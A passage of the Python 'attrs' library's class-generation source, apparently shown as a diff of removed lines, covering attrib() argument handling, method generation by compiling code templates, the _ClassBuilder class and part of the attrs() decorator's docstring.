- - The return value is *not* inspected so the validator has to throw an - exception itself. - - If a `list` is passed, its items are treated as validators and must - all pass. - - Validators can be globally disabled and re-enabled using - `attrs.validators.get_disabled` / `attrs.validators.set_disabled`. - - The validator can also be set using decorator notation as shown below. - - :type validator: `callable` or a `list` of `callable`\\ s. - - :param repr: Include this attribute in the generated ``__repr__`` - method. If ``True``, include the attribute; if ``False``, omit it. By - default, the built-in ``repr()`` function is used. To override how the - attribute value is formatted, pass a ``callable`` that takes a single - value and returns a string. Note that the resulting string is used - as-is, i.e. it will be used directly *instead* of calling ``repr()`` - (the default). - :type repr: a `bool` or a `callable` to use a custom function. - - :param eq: If ``True`` (default), include this attribute in the - generated ``__eq__`` and ``__ne__`` methods that check two instances - for equality. To override how the attribute value is compared, - pass a ``callable`` that takes a single value and returns the value - to be compared. - :type eq: a `bool` or a `callable`. - - :param order: If ``True`` (default), include this attributes in the - generated ``__lt__``, ``__le__``, ``__gt__`` and ``__ge__`` methods. - To override how the attribute value is ordered, - pass a ``callable`` that takes a single value and returns the value - to be ordered. - :type order: a `bool` or a `callable`. - - :param cmp: Setting *cmp* is equivalent to setting *eq* and *order* to the - same value. Must not be mixed with *eq* or *order*. - :type cmp: a `bool` or a `callable`. - - :param Optional[bool] hash: Include this attribute in the generated - ``__hash__`` method. If ``None`` (default), mirror *eq*'s value. This - is the correct behavior according the Python spec. Setting this value - to anything else than ``None`` is *discouraged*. - :param bool init: Include this attribute in the generated ``__init__`` - method. It is possible to set this to ``False`` and set a default - value. In that case this attributed is unconditionally initialized - with the specified default value or factory. - :param callable converter: `callable` that is called by - *attrs*-generated ``__init__`` methods to convert attribute's value - to the desired format. It is given the passed-in value, and the - returned value will be used as the new value of the attribute. The - value is converted before being passed to the validator, if any. - :param metadata: An arbitrary mapping, to be used by third-party - components. See `extending-metadata`. - - :param type: The type of the attribute. Nowadays, the preferred method to - specify the type is using a variable annotation (see :pep:`526`). - This argument is provided for backward compatibility. - Regardless of the approach used, the type will be stored on - ``Attribute.type``. - - Please note that *attrs* doesn't do anything with this metadata by - itself. You can use it as part of your own code or for - `static type checking `. - :param kw_only: Make this attribute keyword-only in the generated - ``__init__`` (if ``init`` is ``False``, this parameter is ignored). - :param on_setattr: Allows to overwrite the *on_setattr* setting from - `attr.s`. If left `None`, the *on_setattr* value from `attr.s` is used. 
- Set to `attrs.setters.NO_OP` to run **no** `setattr` hooks for this - attribute -- regardless of the setting in `attr.s`. - :type on_setattr: `callable`, or a list of callables, or `None`, or - `attrs.setters.NO_OP` - :param Optional[str] alias: Override this attribute's parameter name in the - generated ``__init__`` method. If left `None`, default to ``name`` - stripped of leading underscores. See `private-attributes`. - - .. versionadded:: 15.2.0 *convert* - .. versionadded:: 16.3.0 *metadata* - .. versionchanged:: 17.1.0 *validator* can be a ``list`` now. - .. versionchanged:: 17.1.0 - *hash* is ``None`` and therefore mirrors *eq* by default. - .. versionadded:: 17.3.0 *type* - .. deprecated:: 17.4.0 *convert* - .. versionadded:: 17.4.0 *converter* as a replacement for the deprecated - *convert* to achieve consistency with other noun-based arguments. - .. versionadded:: 18.1.0 - ``factory=f`` is syntactic sugar for ``default=attr.Factory(f)``. - .. versionadded:: 18.2.0 *kw_only* - .. versionchanged:: 19.2.0 *convert* keyword argument removed. - .. versionchanged:: 19.2.0 *repr* also accepts a custom callable. - .. deprecated:: 19.2.0 *cmp* Removal on or after 2021-06-01. - .. versionadded:: 19.2.0 *eq* and *order* - .. versionadded:: 20.1.0 *on_setattr* - .. versionchanged:: 20.3.0 *kw_only* backported to Python 2 - .. versionchanged:: 21.1.0 - *eq*, *order*, and *cmp* also accept a custom callable - .. versionchanged:: 21.1.0 *cmp* undeprecated - .. versionadded:: 22.2.0 *alias* - """ - eq, eq_key, order, order_key = _determine_attrib_eq_order( - cmp, eq, order, True - ) - - if hash is not None and hash is not True and hash is not False: - raise TypeError( - "Invalid value for hash. Must be True, False, or None." - ) - - if factory is not None: - if default is not NOTHING: - raise ValueError( - "The `default` and `factory` arguments are mutually " - "exclusive." - ) - if not callable(factory): - raise ValueError("The `factory` argument must be a callable.") - default = Factory(factory) - - if metadata is None: - metadata = {} - - # Apply syntactic sugar by auto-wrapping. - if isinstance(on_setattr, (list, tuple)): - on_setattr = setters.pipe(*on_setattr) - - if validator and isinstance(validator, (list, tuple)): - validator = and_(*validator) - - if converter and isinstance(converter, (list, tuple)): - converter = pipe(*converter) - - return _CountingAttr( - default=default, - validator=validator, - repr=repr, - cmp=None, - hash=hash, - init=init, - converter=converter, - metadata=metadata, - type=type, - kw_only=kw_only, - eq=eq, - eq_key=eq_key, - order=order, - order_key=order_key, - on_setattr=on_setattr, - alias=alias, - ) - - -def _compile_and_eval(script, globs, locs=None, filename=""): - """ - "Exec" the script with the given global (globs) and local (locs) variables. - """ - bytecode = compile(script, filename, "exec") - eval(bytecode, globs, locs) - - -def _make_method(name, script, filename, globs): - """ - Create the method with the script given and return the method object. - """ - locs = {} - - # In order of debuggers like PDB being able to step through the code, - # we add a fake linecache entry. 
- count = 1 - base_filename = filename - while True: - linecache_tuple = ( - len(script), - None, - script.splitlines(True), - filename, - ) - old_val = linecache.cache.setdefault(filename, linecache_tuple) - if old_val == linecache_tuple: - break - else: - filename = f"{base_filename[:-1]}-{count}>" - count += 1 - - _compile_and_eval(script, globs, locs, filename) - - return locs[name] - - -def _make_attr_tuple_class(cls_name, attr_names): - """ - Create a tuple subclass to hold `Attribute`s for an `attrs` class. - - The subclass is a bare tuple with properties for names. - - class MyClassAttributes(tuple): - __slots__ = () - x = property(itemgetter(0)) - """ - attr_class_name = f"{cls_name}Attributes" - attr_class_template = [ - f"class {attr_class_name}(tuple):", - " __slots__ = ()", - ] - if attr_names: - for i, attr_name in enumerate(attr_names): - attr_class_template.append( - f" {attr_name} = _attrs_property(_attrs_itemgetter({i}))" - ) - else: - attr_class_template.append(" pass") - globs = {"_attrs_itemgetter": itemgetter, "_attrs_property": property} - _compile_and_eval("\n".join(attr_class_template), globs) - return globs[attr_class_name] - - -# Tuple class for extracted attributes from a class definition. -# `base_attrs` is a subset of `attrs`. -_Attributes = _make_attr_tuple_class( - "_Attributes", - [ - # all attributes to build dunder methods for - "attrs", - # attributes that have been inherited - "base_attrs", - # map inherited attributes to their originating classes - "base_attrs_map", - ], -) - - -def _is_class_var(annot): - """ - Check whether *annot* is a typing.ClassVar. - - The string comparison hack is used to avoid evaluating all string - annotations which would put attrs-based classes at a performance - disadvantage compared to plain old classes. - """ - annot = str(annot) - - # Annotation can be quoted. - if annot.startswith(("'", '"')) and annot.endswith(("'", '"')): - annot = annot[1:-1] - - return annot.startswith(_classvar_prefixes) - - -def _has_own_attribute(cls, attrib_name): - """ - Check whether *cls* defines *attrib_name* (and doesn't just inherit it). - """ - attr = getattr(cls, attrib_name, _sentinel) - if attr is _sentinel: - return False - - for base_cls in cls.__mro__[1:]: - a = getattr(base_cls, attrib_name, None) - if attr is a: - return False - - return True - - -def _get_annotations(cls): - """ - Get annotations for *cls*. - """ - if _has_own_attribute(cls, "__annotations__"): - return cls.__annotations__ - - return {} - - -def _collect_base_attrs(cls, taken_attr_names): - """ - Collect attr.ibs from base classes of *cls*, except *taken_attr_names*. - """ - base_attrs = [] - base_attr_map = {} # A dictionary of base attrs to their classes. - - # Traverse the MRO and collect attributes. - for base_cls in reversed(cls.__mro__[1:-1]): - for a in getattr(base_cls, "__attrs_attrs__", []): - if a.inherited or a.name in taken_attr_names: - continue - - a = a.evolve(inherited=True) - base_attrs.append(a) - base_attr_map[a.name] = base_cls - - # For each name, only keep the freshest definition i.e. the furthest at the - # back. base_attr_map is fine because it gets overwritten with every new - # instance. - filtered = [] - seen = set() - for a in reversed(base_attrs): - if a.name in seen: - continue - filtered.insert(0, a) - seen.add(a.name) - - return filtered, base_attr_map - - -def _collect_base_attrs_broken(cls, taken_attr_names): - """ - Collect attr.ibs from base classes of *cls*, except *taken_attr_names*. - - N.B. 
*taken_attr_names* will be mutated. - - Adhere to the old incorrect behavior. - - Notably it collects from the front and considers inherited attributes which - leads to the buggy behavior reported in #428. - """ - base_attrs = [] - base_attr_map = {} # A dictionary of base attrs to their classes. - - # Traverse the MRO and collect attributes. - for base_cls in cls.__mro__[1:-1]: - for a in getattr(base_cls, "__attrs_attrs__", []): - if a.name in taken_attr_names: - continue - - a = a.evolve(inherited=True) - taken_attr_names.add(a.name) - base_attrs.append(a) - base_attr_map[a.name] = base_cls - - return base_attrs, base_attr_map - - -def _transform_attrs( - cls, these, auto_attribs, kw_only, collect_by_mro, field_transformer -): - """ - Transform all `_CountingAttr`s on a class into `Attribute`s. - - If *these* is passed, use that and don't look for them on the class. - - *collect_by_mro* is True, collect them in the correct MRO order, otherwise - use the old -- incorrect -- order. See #428. - - Return an `_Attributes`. - """ - cd = cls.__dict__ - anns = _get_annotations(cls) - - if these is not None: - ca_list = [(name, ca) for name, ca in these.items()] - elif auto_attribs is True: - ca_names = { - name - for name, attr in cd.items() - if isinstance(attr, _CountingAttr) - } - ca_list = [] - annot_names = set() - for attr_name, type in anns.items(): - if _is_class_var(type): - continue - annot_names.add(attr_name) - a = cd.get(attr_name, NOTHING) - - if not isinstance(a, _CountingAttr): - if a is NOTHING: - a = attrib() - else: - a = attrib(default=a) - ca_list.append((attr_name, a)) - - unannotated = ca_names - annot_names - if len(unannotated) > 0: - raise UnannotatedAttributeError( - "The following `attr.ib`s lack a type annotation: " - + ", ".join( - sorted(unannotated, key=lambda n: cd.get(n).counter) - ) - + "." - ) - else: - ca_list = sorted( - ( - (name, attr) - for name, attr in cd.items() - if isinstance(attr, _CountingAttr) - ), - key=lambda e: e[1].counter, - ) - - own_attrs = [ - Attribute.from_counting_attr( - name=attr_name, ca=ca, type=anns.get(attr_name) - ) - for attr_name, ca in ca_list - ] - - if collect_by_mro: - base_attrs, base_attr_map = _collect_base_attrs( - cls, {a.name for a in own_attrs} - ) - else: - base_attrs, base_attr_map = _collect_base_attrs_broken( - cls, {a.name for a in own_attrs} - ) - - if kw_only: - own_attrs = [a.evolve(kw_only=True) for a in own_attrs] - base_attrs = [a.evolve(kw_only=True) for a in base_attrs] - - attrs = base_attrs + own_attrs - - # Mandatory vs non-mandatory attr order only matters when they are part of - # the __init__ signature and when they aren't kw_only (which are moved to - # the end and can be mandatory or non-mandatory in any order, as they will - # be specified as keyword args anyway). Check the order of those attrs: - had_default = False - for a in (a for a in attrs if a.init is not False and a.kw_only is False): - if had_default is True and a.default is NOTHING: - raise ValueError( - "No mandatory attributes allowed after an attribute with a " - f"default value or factory. Attribute in question: {a!r}" - ) - - if had_default is False and a.default is not NOTHING: - had_default = True - - if field_transformer is not None: - attrs = field_transformer(cls, attrs) - - # Resolve default field alias after executing field_transformer. - # This allows field_transformer to differentiate between explicit vs - # default aliases and supply their own defaults. 
- attrs = [ - a.evolve(alias=_default_init_alias_for(a.name)) if not a.alias else a - for a in attrs - ] - - # Create AttrsClass *after* applying the field_transformer since it may - # add or remove attributes! - attr_names = [a.name for a in attrs] - AttrsClass = _make_attr_tuple_class(cls.__name__, attr_names) - - return _Attributes((AttrsClass(attrs), base_attrs, base_attr_map)) - - -def _frozen_setattrs(self, name, value): - """ - Attached to frozen classes as __setattr__. - """ - if isinstance(self, BaseException) and name in ( - "__cause__", - "__context__", - "__traceback__", - ): - BaseException.__setattr__(self, name, value) - return - - raise FrozenInstanceError() - - -def _frozen_delattrs(self, name): - """ - Attached to frozen classes as __delattr__. - """ - raise FrozenInstanceError() - - -class _ClassBuilder: - """ - Iteratively build *one* class. - """ - - __slots__ = ( - "_attr_names", - "_attrs", - "_base_attr_map", - "_base_names", - "_cache_hash", - "_cls", - "_cls_dict", - "_delete_attribs", - "_frozen", - "_has_pre_init", - "_has_post_init", - "_is_exc", - "_on_setattr", - "_slots", - "_weakref_slot", - "_wrote_own_setattr", - "_has_custom_setattr", - ) - - def __init__( - self, - cls, - these, - slots, - frozen, - weakref_slot, - getstate_setstate, - auto_attribs, - kw_only, - cache_hash, - is_exc, - collect_by_mro, - on_setattr, - has_custom_setattr, - field_transformer, - ): - attrs, base_attrs, base_map = _transform_attrs( - cls, - these, - auto_attribs, - kw_only, - collect_by_mro, - field_transformer, - ) - - self._cls = cls - self._cls_dict = dict(cls.__dict__) if slots else {} - self._attrs = attrs - self._base_names = {a.name for a in base_attrs} - self._base_attr_map = base_map - self._attr_names = tuple(a.name for a in attrs) - self._slots = slots - self._frozen = frozen - self._weakref_slot = weakref_slot - self._cache_hash = cache_hash - self._has_pre_init = bool(getattr(cls, "__attrs_pre_init__", False)) - self._has_post_init = bool(getattr(cls, "__attrs_post_init__", False)) - self._delete_attribs = not bool(these) - self._is_exc = is_exc - self._on_setattr = on_setattr - - self._has_custom_setattr = has_custom_setattr - self._wrote_own_setattr = False - - self._cls_dict["__attrs_attrs__"] = self._attrs - - if frozen: - self._cls_dict["__setattr__"] = _frozen_setattrs - self._cls_dict["__delattr__"] = _frozen_delattrs - - self._wrote_own_setattr = True - elif on_setattr in ( - _ng_default_on_setattr, - setters.validate, - setters.convert, - ): - has_validator = has_converter = False - for a in attrs: - if a.validator is not None: - has_validator = True - if a.converter is not None: - has_converter = True - - if has_validator and has_converter: - break - if ( - ( - on_setattr == _ng_default_on_setattr - and not (has_validator or has_converter) - ) - or (on_setattr == setters.validate and not has_validator) - or (on_setattr == setters.convert and not has_converter) - ): - # If class-level on_setattr is set to convert + validate, but - # there's no field to convert or validate, pretend like there's - # no on_setattr. - self._on_setattr = None - - if getstate_setstate: - ( - self._cls_dict["__getstate__"], - self._cls_dict["__setstate__"], - ) = self._make_getstate_setstate() - - def __repr__(self): - return f"<_ClassBuilder(cls={self._cls.__name__})>" - - if PY310: - import abc - - def build_class(self): - """ - Finalize class based on the accumulated configuration. - - Builder cannot be used after calling this method. 
- """ - if self._slots is True: - return self._create_slots_class() - - return self.abc.update_abstractmethods( - self._patch_original_class() - ) - - else: - - def build_class(self): - """ - Finalize class based on the accumulated configuration. - - Builder cannot be used after calling this method. - """ - if self._slots is True: - return self._create_slots_class() - - return self._patch_original_class() - - def _patch_original_class(self): - """ - Apply accumulated methods and return the class. - """ - cls = self._cls - base_names = self._base_names - - # Clean class of attribute definitions (`attr.ib()`s). - if self._delete_attribs: - for name in self._attr_names: - if ( - name not in base_names - and getattr(cls, name, _sentinel) is not _sentinel - ): - try: - delattr(cls, name) - except AttributeError: - # This can happen if a base class defines a class - # variable and we want to set an attribute with the - # same name by using only a type annotation. - pass - - # Attach our dunder methods. - for name, value in self._cls_dict.items(): - setattr(cls, name, value) - - # If we've inherited an attrs __setattr__ and don't write our own, - # reset it to object's. - if not self._wrote_own_setattr and getattr( - cls, "__attrs_own_setattr__", False - ): - cls.__attrs_own_setattr__ = False - - if not self._has_custom_setattr: - cls.__setattr__ = _obj_setattr - - return cls - - def _create_slots_class(self): - """ - Build and return a new class with a `__slots__` attribute. - """ - cd = { - k: v - for k, v in self._cls_dict.items() - if k not in tuple(self._attr_names) + ("__dict__", "__weakref__") - } - - # If our class doesn't have its own implementation of __setattr__ - # (either from the user or by us), check the bases, if one of them has - # an attrs-made __setattr__, that needs to be reset. We don't walk the - # MRO because we only care about our immediate base classes. - # XXX: This can be confused by subclassing a slotted attrs class with - # XXX: a non-attrs class and subclass the resulting class with an attrs - # XXX: class. See `test_slotted_confused` for details. For now that's - # XXX: OK with us. - if not self._wrote_own_setattr: - cd["__attrs_own_setattr__"] = False - - if not self._has_custom_setattr: - for base_cls in self._cls.__bases__: - if base_cls.__dict__.get("__attrs_own_setattr__", False): - cd["__setattr__"] = _obj_setattr - break - - # Traverse the MRO to collect existing slots - # and check for an existing __weakref__. - existing_slots = dict() - weakref_inherited = False - for base_cls in self._cls.__mro__[1:-1]: - if base_cls.__dict__.get("__weakref__", None) is not None: - weakref_inherited = True - existing_slots.update( - { - name: getattr(base_cls, name) - for name in getattr(base_cls, "__slots__", []) - } - ) - - base_names = set(self._base_names) - - names = self._attr_names - if ( - self._weakref_slot - and "__weakref__" not in getattr(self._cls, "__slots__", ()) - and "__weakref__" not in names - and not weakref_inherited - ): - names += ("__weakref__",) - - # We only add the names of attributes that aren't inherited. - # Setting __slots__ to inherited attributes wastes memory. - slot_names = [name for name in names if name not in base_names] - # There are slots for attributes from current class - # that are defined in parent classes. 
- # As their descriptors may be overridden by a child class, - # we collect them here and update the class dict - reused_slots = { - slot: slot_descriptor - for slot, slot_descriptor in existing_slots.items() - if slot in slot_names - } - slot_names = [name for name in slot_names if name not in reused_slots] - cd.update(reused_slots) - if self._cache_hash: - slot_names.append(_hash_cache_field) - cd["__slots__"] = tuple(slot_names) - - cd["__qualname__"] = self._cls.__qualname__ - - # Create new class based on old class and our methods. - cls = type(self._cls)(self._cls.__name__, self._cls.__bases__, cd) - - # The following is a fix for - # . - # If a method mentions `__class__` or uses the no-arg super(), the - # compiler will bake a reference to the class in the method itself - # as `method.__closure__`. Since we replace the class with a - # clone, we rewrite these references so it keeps working. - for item in cls.__dict__.values(): - if isinstance(item, (classmethod, staticmethod)): - # Class- and staticmethods hide their functions inside. - # These might need to be rewritten as well. - closure_cells = getattr(item.__func__, "__closure__", None) - elif isinstance(item, property): - # Workaround for property `super()` shortcut (PY3-only). - # There is no universal way for other descriptors. - closure_cells = getattr(item.fget, "__closure__", None) - else: - closure_cells = getattr(item, "__closure__", None) - - if not closure_cells: # Catch None or the empty list. - continue - for cell in closure_cells: - try: - match = cell.cell_contents is self._cls - except ValueError: # ValueError: Cell is empty - pass - else: - if match: - set_closure_cell(cell, cls) - - return cls - - def add_repr(self, ns): - self._cls_dict["__repr__"] = self._add_method_dunders( - _make_repr(self._attrs, ns, self._cls) - ) - return self - - def add_str(self): - repr = self._cls_dict.get("__repr__") - if repr is None: - raise ValueError( - "__str__ can only be generated if a __repr__ exists." - ) - - def __str__(self): - return self.__repr__() - - self._cls_dict["__str__"] = self._add_method_dunders(__str__) - return self - - def _make_getstate_setstate(self): - """ - Create custom __setstate__ and __getstate__ methods. - """ - # __weakref__ is not writable. - state_attr_names = tuple( - an for an in self._attr_names if an != "__weakref__" - ) - - def slots_getstate(self): - """ - Automatically created by attrs. - """ - return {name: getattr(self, name) for name in state_attr_names} - - hash_caching_enabled = self._cache_hash - - def slots_setstate(self, state): - """ - Automatically created by attrs. - """ - __bound_setattr = _obj_setattr.__get__(self) - if isinstance(state, tuple): - # Backward compatibility with attrs instances pickled with - # attrs versions before v22.2.0 which stored tuples. - for name, value in zip(state_attr_names, state): - __bound_setattr(name, value) - else: - for name in state_attr_names: - if name in state: - __bound_setattr(name, state[name]) - - # The hash code cache is not included when the object is - # serialized, but it still needs to be initialized to None to - # indicate that the first call to __hash__ should be a cache - # miss. 
- if hash_caching_enabled: - __bound_setattr(_hash_cache_field, None) - - return slots_getstate, slots_setstate - - def make_unhashable(self): - self._cls_dict["__hash__"] = None - return self - - def add_hash(self): - self._cls_dict["__hash__"] = self._add_method_dunders( - _make_hash( - self._cls, - self._attrs, - frozen=self._frozen, - cache_hash=self._cache_hash, - ) - ) - - return self - - def add_init(self): - self._cls_dict["__init__"] = self._add_method_dunders( - _make_init( - self._cls, - self._attrs, - self._has_pre_init, - self._has_post_init, - self._frozen, - self._slots, - self._cache_hash, - self._base_attr_map, - self._is_exc, - self._on_setattr, - attrs_init=False, - ) - ) - - return self - - def add_match_args(self): - self._cls_dict["__match_args__"] = tuple( - field.name - for field in self._attrs - if field.init and not field.kw_only - ) - - def add_attrs_init(self): - self._cls_dict["__attrs_init__"] = self._add_method_dunders( - _make_init( - self._cls, - self._attrs, - self._has_pre_init, - self._has_post_init, - self._frozen, - self._slots, - self._cache_hash, - self._base_attr_map, - self._is_exc, - self._on_setattr, - attrs_init=True, - ) - ) - - return self - - def add_eq(self): - cd = self._cls_dict - - cd["__eq__"] = self._add_method_dunders( - _make_eq(self._cls, self._attrs) - ) - cd["__ne__"] = self._add_method_dunders(_make_ne()) - - return self - - def add_order(self): - cd = self._cls_dict - - cd["__lt__"], cd["__le__"], cd["__gt__"], cd["__ge__"] = ( - self._add_method_dunders(meth) - for meth in _make_order(self._cls, self._attrs) - ) - - return self - - def add_setattr(self): - if self._frozen: - return self - - sa_attrs = {} - for a in self._attrs: - on_setattr = a.on_setattr or self._on_setattr - if on_setattr and on_setattr is not setters.NO_OP: - sa_attrs[a.name] = a, on_setattr - - if not sa_attrs: - return self - - if self._has_custom_setattr: - # We need to write a __setattr__ but there already is one! - raise ValueError( - "Can't combine custom __setattr__ with on_setattr hooks." - ) - - # docstring comes from _add_method_dunders - def __setattr__(self, name, val): - try: - a, hook = sa_attrs[name] - except KeyError: - nval = val - else: - nval = hook(self, a, val) - - _obj_setattr(self, name, nval) - - self._cls_dict["__attrs_own_setattr__"] = True - self._cls_dict["__setattr__"] = self._add_method_dunders(__setattr__) - self._wrote_own_setattr = True - - return self - - def _add_method_dunders(self, method): - """ - Add __module__ and __qualname__ to a *method* if possible. - """ - try: - method.__module__ = self._cls.__module__ - except AttributeError: - pass - - try: - method.__qualname__ = ".".join( - (self._cls.__qualname__, method.__name__) - ) - except AttributeError: - pass - - try: - method.__doc__ = ( - "Method generated by attrs for class " - f"{self._cls.__qualname__}." - ) - except AttributeError: - pass - - return method - - -def _determine_attrs_eq_order(cmp, eq, order, default_eq): - """ - Validate the combination of *cmp*, *eq*, and *order*. Derive the effective - values of eq and order. If *eq* is None, set it to *default_eq*. - """ - if cmp is not None and any((eq is not None, order is not None)): - raise ValueError("Don't mix `cmp` with `eq' and `order`.") - - # cmp takes precedence due to bw-compatibility. - if cmp is not None: - return cmp, cmp - - # If left None, equality is set to the specified default and ordering - # mirrors equality. 
- if eq is None: - eq = default_eq - - if order is None: - order = eq - - if eq is False and order is True: - raise ValueError("`order` can only be True if `eq` is True too.") - - return eq, order - - -def _determine_attrib_eq_order(cmp, eq, order, default_eq): - """ - Validate the combination of *cmp*, *eq*, and *order*. Derive the effective - values of eq and order. If *eq* is None, set it to *default_eq*. - """ - if cmp is not None and any((eq is not None, order is not None)): - raise ValueError("Don't mix `cmp` with `eq' and `order`.") - - def decide_callable_or_boolean(value): - """ - Decide whether a key function is used. - """ - if callable(value): - value, key = True, value - else: - key = None - return value, key - - # cmp takes precedence due to bw-compatibility. - if cmp is not None: - cmp, cmp_key = decide_callable_or_boolean(cmp) - return cmp, cmp_key, cmp, cmp_key - - # If left None, equality is set to the specified default and ordering - # mirrors equality. - if eq is None: - eq, eq_key = default_eq, None - else: - eq, eq_key = decide_callable_or_boolean(eq) - - if order is None: - order, order_key = eq, eq_key - else: - order, order_key = decide_callable_or_boolean(order) - - if eq is False and order is True: - raise ValueError("`order` can only be True if `eq` is True too.") - - return eq, eq_key, order, order_key - - -def _determine_whether_to_implement( - cls, flag, auto_detect, dunders, default=True -): - """ - Check whether we should implement a set of methods for *cls*. - - *flag* is the argument passed into @attr.s like 'init', *auto_detect* the - same as passed into @attr.s and *dunders* is a tuple of attribute names - whose presence signal that the user has implemented it themselves. - - Return *default* if no reason for either for or against is found. - """ - if flag is True or flag is False: - return flag - - if flag is None and auto_detect is False: - return default - - # Logically, flag is None and auto_detect is True here. - for dunder in dunders: - if _has_own_attribute(cls, dunder): - return False - - return default - - -def attrs( - maybe_cls=None, - these=None, - repr_ns=None, - repr=None, - cmp=None, - hash=None, - init=None, - slots=False, - frozen=False, - weakref_slot=True, - str=False, - auto_attribs=False, - kw_only=False, - cache_hash=False, - auto_exc=False, - eq=None, - order=None, - auto_detect=False, - collect_by_mro=False, - getstate_setstate=None, - on_setattr=None, - field_transformer=None, - match_args=True, - unsafe_hash=None, -): - r""" - A class decorator that adds :term:`dunder methods` according to the - specified attributes using `attr.ib` or the *these* argument. - - Please consider using `attrs.define` / `attrs.frozen` in new code - (``attr.s`` will *never* go away, though). - - :param these: A dictionary of name to `attr.ib` mappings. This is - useful to avoid the definition of your attributes within the class body - because you can't (e.g. if you want to add ``__repr__`` methods to - Django models) or don't want to. - - If *these* is not ``None``, *attrs* will *not* search the class body - for attributes and will *not* remove any attributes from it. - - The order is deduced from the order of the attributes inside *these*. - - :type these: `dict` of `str` to `attr.ib` - - :param str repr_ns: When using nested classes, there's no way in Python 2 - to automatically detect that. Therefore it's possible to set the - namespace explicitly for a more meaningful ``repr`` output. 
- :param bool auto_detect: Instead of setting the *init*, *repr*, *eq*, - *order*, and *hash* arguments explicitly, assume they are set to - ``True`` **unless any** of the involved methods for one of the - arguments is implemented in the *current* class (i.e. it is *not* - inherited from some base class). - - So for example by implementing ``__eq__`` on a class yourself, - *attrs* will deduce ``eq=False`` and will create *neither* - ``__eq__`` *nor* ``__ne__`` (but Python classes come with a sensible - ``__ne__`` by default, so it *should* be enough to only implement - ``__eq__`` in most cases). - - .. warning:: - - If you prevent *attrs* from creating the ordering methods for you - (``order=False``, e.g. by implementing ``__le__``), it becomes - *your* responsibility to make sure its ordering is sound. The best - way is to use the `functools.total_ordering` decorator. - - - Passing ``True`` or ``False`` to *init*, *repr*, *eq*, *order*, - *cmp*, or *hash* overrides whatever *auto_detect* would determine. - - :param bool repr: Create a ``__repr__`` method with a human readable - representation of *attrs* attributes.. - :param bool str: Create a ``__str__`` method that is identical to - ``__repr__``. This is usually not necessary except for - `Exception`\ s. - :param Optional[bool] eq: If ``True`` or ``None`` (default), add ``__eq__`` - and ``__ne__`` methods that check two instances for equality. - - They compare the instances as if they were tuples of their *attrs* - attributes if and only if the types of both classes are *identical*! - :param Optional[bool] order: If ``True``, add ``__lt__``, ``__le__``, - ``__gt__``, and ``__ge__`` methods that behave like *eq* above and - allow instances to be ordered. If ``None`` (default) mirror value of - *eq*. - :param Optional[bool] cmp: Setting *cmp* is equivalent to setting *eq* - and *order* to the same value. Must not be mixed with *eq* or *order*. - :param Optional[bool] unsafe_hash: If ``None`` (default), the ``__hash__`` - method is generated according how *eq* and *frozen* are set. - - 1. If *both* are True, *attrs* will generate a ``__hash__`` for you. - 2. If *eq* is True and *frozen* is False, ``__hash__`` will be set to - None, marking it unhashable (which it is). - 3. If *eq* is False, ``__hash__`` will be left untouched meaning the - ``__hash__`` method of the base class will be used (if base class is - ``object``, this means it will fall back to id-based hashing.). - - Although not recommended, you can decide for yourself and force - *attrs* to create one (e.g. if the class is immutable even though you - didn't freeze it programmatically) by passing ``True`` or not. Both of - these cases are rather special and should be used carefully. - - See our documentation on `hashing`, Python's documentation on - `object.__hash__`, and the `GitHub issue that led to the default \ - behavior `_ for more - details. - :param Optional[bool] hash: Alias for *unsafe_hash*. *unsafe_hash* takes - precedence. - :param bool init: Create a ``__init__`` method that initializes the - *attrs* attributes. Leading underscores are stripped for the argument - name. If a ``__attrs_pre_init__`` method exists on the class, it will - be called before the class is initialized. If a ``__attrs_post_init__`` - method exists on the class, it will be called after the class is fully - initialized. - - If ``init`` is ``False``, an ``__attrs_init__`` method will be - injected instead. 
This allows you to define a custom ``__init__`` - method that can do pre-init work such as ``super().__init__()``, - and then call ``__attrs_init__()`` and ``__attrs_post_init__()``. - :param bool slots: Create a :term:`slotted class ` that's - more memory-efficient. Slotted classes are generally superior to the - default dict classes, but have some gotchas you should know about, so - we encourage you to read the :term:`glossary entry `. - :param bool frozen: Make instances immutable after initialization. If - someone attempts to modify a frozen instance, - `attrs.exceptions.FrozenInstanceError` is raised. - - .. note:: - - 1. This is achieved by installing a custom ``__setattr__`` method - on your class, so you can't implement your own. - - 2. True immutability is impossible in Python. - - 3. This *does* have a minor a runtime performance `impact - ` when initializing new instances. In other words: - ``__init__`` is slightly slower with ``frozen=True``. - - 4. If a class is frozen, you cannot modify ``self`` in - ``__attrs_post_init__`` or a self-written ``__init__``. You can - circumvent that limitation by using - ``object.__setattr__(self, "attribute_name", value)``. - - 5. Subclasses of a frozen class are frozen too. - - :param bool weakref_slot: Make instances weak-referenceable. This has no - effect unless ``slots`` is also enabled. - :param bool auto_attribs: If ``True``, collect :pep:`526`-annotated - attributes from the class body. - - In this case, you **must** annotate every field. If *attrs* - encounters a field that is set to an `attr.ib` but lacks a type - annotation, an `attr.exceptions.UnannotatedAttributeError` is - raised. Use ``field_name: typing.Any = attr.ib(...)`` if you don't - want to set a type. - - If you assign a value to those attributes (e.g. ``x: int = 42``), that - value becomes the default value like if it were passed using - ``attr.ib(default=42)``. Passing an instance of `attrs.Factory` also - works as expected in most cases (see warning below). - - Attributes annotated as `typing.ClassVar`, and attributes that are - neither annotated nor set to an `attr.ib` are **ignored**. - - .. warning:: - For features that use the attribute name to create decorators (e.g. - :ref:`validators `), you still *must* assign `attr.ib` - to them. Otherwise Python will either not find the name or try to - use the default value to call e.g. ``validator`` on it. - - These errors can be quite confusing and probably the most common bug - report on our bug tracker. - - :param bool kw_only: Make all attributes keyword-only - in the generated ``__init__`` (if ``init`` is ``False``, this - parameter is ignored). - :param bool cache_hash: Ensure that the object's hash code is computed - only once and stored on the object. If this is set to ``True``, - hashing must be either explicitly or implicitly enabled for this - class. If the hash code is cached, avoid any reassignments of - fields involved in hash code computation or mutations of the objects - those fields point to after object creation. If such changes occur, - the behavior of the object's hash code is undefined. - :param bool auto_exc: If the class subclasses `BaseException` - (which implicitly includes any subclass of any exception), the - following happens to behave like a well-behaved Python exceptions - class: - - - the values for *eq*, *order*, and *hash* are ignored and the - instances compare and hash by the instance's ids (N.B. 
